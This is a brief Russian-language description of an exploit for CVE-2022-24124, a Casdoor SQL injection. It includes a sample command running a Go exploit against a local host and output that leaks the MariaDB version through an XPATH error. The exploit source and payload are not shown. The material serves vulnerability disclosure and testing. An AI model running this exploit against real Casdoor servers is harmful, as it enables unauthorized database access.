
Дамп версии SQL-базы данных на хосте с запущенным Casdoor < 1.13.1
Эксплойт-код для CVE-2022-24124, также известный как Casdoor SQL Injection
Ссылки на эксплойт: [ExploitDB-50792] [PacketStormSecurity]
Ожидаемый результат: получение версии SQL-базы данных на хосте, где работает Casdoor < 1.13.1
Предназначен только для образовательных целей и тестирования в корпоративных средах.
Barricade➜ go run exploit.go -u http://127.0.0.1:8080
-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)
[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1